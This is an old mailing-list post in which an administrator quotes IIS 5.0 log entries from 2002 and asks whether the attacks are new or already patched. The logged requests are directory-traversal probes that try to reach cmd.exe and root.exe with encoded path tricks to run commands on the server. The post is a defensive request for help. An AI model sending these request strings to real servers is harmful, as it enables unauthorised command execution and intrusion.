Over the last few days I have seen the same 15 or so lines appear in my
MS2000 web logs several times.  They are obvious hack attempts.  What I need
to know is whether this is a new exploit or one that I am already patched
against. I have what I believe to be the latest patches from the Microsoft
website.


#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-06-26 04:29:25
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent) cs(Referer)
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /scripts/root.exe /c+dir 404 www - -
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /MSADC/root.exe /c+dir 403 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 www - -

Anyone know the answer or know where I need to go to find it?

Steve Weitzman
[EMAIL PROTECTED]
